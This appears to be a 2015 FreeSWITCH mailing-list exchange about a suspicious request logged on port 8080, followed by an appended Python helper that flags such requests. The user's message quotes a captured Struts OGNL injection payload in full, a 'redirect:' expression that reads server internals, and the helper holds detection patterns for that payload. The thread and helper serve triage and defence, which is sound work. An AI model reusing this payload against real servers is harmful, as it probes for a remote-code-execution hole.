<div dir="ltr"><div class="gmail_default" style="font-family:&#39;trebuchet ms&#39;,sans-serif">Looks like a [likely automatic] attempt to exploit a well-known Struts vulnerability.</div><div class="gmail_default" style="font-family:&#39;trebuchet ms&#39;,sans-serif">Nothing to worry about - if you keep FreeSWITCH on a port well known for presenting HTTP-related services, you&#39;ll get more of it.</div><div class="gmail_default" style="font-family:&#39;trebuchet ms&#39;,sans-serif"><br></div><div class="gmail_default" style="font-family:&#39;trebuchet ms&#39;,sans-serif">Just block all strings containing &#39;<span style="font-size:12.8px;font-family:arial,sans-serif">HTTP/1&#39; and forget about that - the Internet is full of bots and zombies.</span></div><div class="gmail_default" style="font-family:&#39;trebuchet ms&#39;,sans-serif"><span style="font-size:12.8px;font-family:arial,sans-serif"><br></span></div><div class="gmail_default" style="font-family:&#39;trebuchet ms&#39;,sans-serif"><span style="font-size:12.8px;font-family:arial,sans-serif">Best regards,</span></div><div class="gmail_default" style="font-family:&#39;trebuchet ms&#39;,sans-serif"><span style="font-size:12.8px;font-family:arial,sans-serif">O.</span></div></div><div class="gmail_extra"><br><div class="gmail_quote">On 18 November 2015 at 17:02, Russell Treleaven <span dir="ltr">&lt;<a href="mailto:rtreleaven@bunnykick.ca" target="_blank">rtreleaven@bunnykick.ca</a>&gt;</span> wrote:<br><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex"><div dir="ltr"><div>I saw this on the FreeSWITCH console months ago and did not get around to following up on it until now.</div><div>A FreeSWITCH profile is listening on :8080</div><div><br></div><div>a.b.c.d = remote address</div><div>w.x.y.z = FreeSWITCH address</div><div><br></div><div>What is this?</div><div>Is it a concern?</div><div><br></div><div>recv 607 bytes from tcp/[a.b.c.d]:4423 at 17:50:50.225319:</div><div>  
 ------------------------------------------------------------------------</div><div>   POST /login.action HTTP/1.1</div><div>   User-Agent: Mozilla/5.0</div><div>   Accept: */*</div><div>   Content-Type: application/x-www-form-urlencoded</div><div>   Host: w.x.y.z:8080</div><div> </div><div>Content-Length: 395</div><div>   Expect: 100-continue</div><div>   Connection: Keep-Alive</div><div>   </div><div>   redirect:${%23res%3d%23context.get(&#39;com.opensymphony.xwork2.dispatcher.HttpServletResponse&#39;),%23res.setCharacterEncoding(%22UTF-8%22),%23req%3d%23context.get(&#39;com.opensymphony.xwork2.dispatcher.HttpServletRequest&#39;),%23res.getWriter().print(%22dir:%22),%23res.getWriter().println(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23res.getWriter().flush(),%23res.getWriter().close()}</div><div><br></div></div>
</blockquote></div><br></div>
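<div>Added example, not part of either message in this thread: a Python triage function for messages copied from the console dump. It separates SIP from stray HTTP/1.x requests (the traffic the reply suggests blocking) and flags Struts OGNL probes like the one quoted. The function name, the constructed samples and the extra <code>action:</code> / <code>redirectAction:</code> prefixes are assumptions of this example and go beyond the single <code>redirect:</code> case in the dump.</div>

```python
import re
from urllib.parse import unquote

HTTP_LINE = re.compile(r"^[A-Z]+ (\S+) HTTP/1\.[01]$")
SIP_LINE = re.compile(r"^[A-Z]+ \S+ SIP/2\.0$")
# Struts action-mapper prefix followed by an OGNL expression opener.
STRUTS_PREFIX = re.compile(
    r"(?:^|[?&])(redirect|redirectAction|action):\s*[$%]\{", re.MULTILINE)
OGNL_MARKERS = ("#context", "com.opensymphony.xwork2", "getWriter()")

# Constructed samples modelled on the dump in this thread. The HTTP body is
# shortened, so the Content-Length value no longer matches it.
SAMPLE_HTTP = """
   POST /login.action HTTP/1.1
   User-Agent: Mozilla/5.0
   Host: w.x.y.z:8080

Content-Length: 395
   Expect: 100-continue

   redirect:${%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.getWriter().print(%22dir:%22)}
"""
SAMPLE_SIP = "OPTIONS sip:w.x.y.z:8080 SIP/2.0\nVia: SIP/2.0/TCP a.b.c.d:4423\n"


def classify_capture(raw):
    """Classify one message copied from a console 'recv' dump (hypothetical helper)."""
    lines = [ln.strip() for ln in raw.strip().splitlines()]
    first = lines[0] if lines else ""
    result = {"protocol": "unknown", "struts_probe": False,
              "prefix": None, "markers": []}
    if SIP_LINE.match(first):
        result["protocol"] = "sip"
        return result
    http = HTTP_LINE.match(first)
    if not http:
        return result
    result["protocol"] = "http"
    # The dump can contain a stray blank line inside the headers, so scan the
    # request target plus every following line instead of splitting at the
    # first blank line. Percent-decoding turns %23 into '#' and %3d into '='.
    haystack = unquote("\n".join([http.group(1)] + lines[1:]))
    hit = STRUTS_PREFIX.search(haystack)
    if hit:
        result["struts_probe"] = True
        result["prefix"] = hit.group(1)
        result["markers"] = [m for m in OGNL_MARKERS if m in haystack]
    return result


if __name__ == "__main__":
    for sample in (SAMPLE_HTTP, SAMPLE_SIP):
        print(classify_capture(sample))
```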